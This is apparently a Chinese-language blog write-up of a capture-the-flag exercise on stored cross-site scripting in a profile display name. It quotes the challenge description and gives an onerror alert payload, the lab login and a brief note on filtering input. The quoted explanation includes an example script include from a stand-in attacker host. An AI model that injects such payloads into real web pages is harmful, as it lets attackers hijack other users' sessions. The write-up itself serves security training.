[题目]

 

The developers of the application implemented a social networking feature where users can see each others profiles. This is a nice looking Rich UI widget based on Bootstrap and JQuery. Users have the ability to preview how their profile looks to others.

Obviously there's XSS in this newly introduced feature. You won't have to do anything nefarious, like stealing credentials, to pass the challenge.

Simply produce a JavaScript alert that says FIRE! - including exclamation mark. Every time a user sees your profile they should see the FIRE! message. You can have fun with the page and pop-up all kind of messages if you'd like, but when you're ready, pop-up FIRE! and you can get your code.

Note: Due to complexities associated with executing JavaScript on the server side, the validation for the challenge is a regular expression so if you encounter any false positives/negatives, please excuse the organizers.

Tips for completing the challenge

•     It is not enough to insert HTML markup in the page. You need to see the actual javascript pop-up.
•     Use view source to look at the javascript code in the page. See if you can spot an issue there.
•     Leverage the payloads on this page. See if any of them pops.

 

PS: The challenge is inspired from the real life story of the Samy worm, the fastest spreading virus of all time.

 

[题目说明]

　　这一题是要我们利用XSS 攻击让使用者看到你的profile时就会跳出一个pop up 显示 Fire!。

[弱点提示]

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

 

　　XSS攻击是在输入源中输入可执行的javascript 执行码作为输入值，该执行码一但提交到网页就会被执行，而XSS攻击有几种基本类型，大家有兴趣可以自己找资料参考，这边就不特做说明，但附上题目对XSS攻击的补充说明如下:

A Bit About XSS

Web applications have become extremely widespread due to their portability and ease of use. At the same time Cross-Site Scripting (XSS) has become one of the most common security bugs found in software.

The main impact of XSS is that it allows attackers to alter the functionality of the web application. This is possible because attackers can inject JavaScript into the page. A common technique is to inject a JavaScript include to a site the attacker controls. Then they can write large scripts, even JavaScript keyloggers have been written. Example malicious input:<script src="https://evil.bad/attack.js"></script> The same concept applies to "Inclusion of Functionality from Untrusted Control Sphere".

XSS is relatively easy to find by novice testers while at the same time can be very hard to prevent. There are many areas in a page that need to be protected and many different type of payloads depending on each area.

For a list of many other XSS payloads visit: The OWASP XSS Filter Evasion Cheat Sheet

 

 [解答]

1. 进入网页: https://insecureinctm.us-east-1.elasticbeanstalk.com/cwe79.jsp
2. 登入demo with password demo1234。
3. 在Display Name栏位输入底下数值: <img src=bla onerror=alert('FIRE!')>

4. 按下Update,及跳出弹跳框写FIRE! ，完成任务。

 

[安全原理]

　　这是根据题目题是中给出的下列程式码所进行的XSS攻击猜测，要防止XSS攻击就得对输入栏位值做必要的scripting 符号过滤检查。

2019年2月26日星期二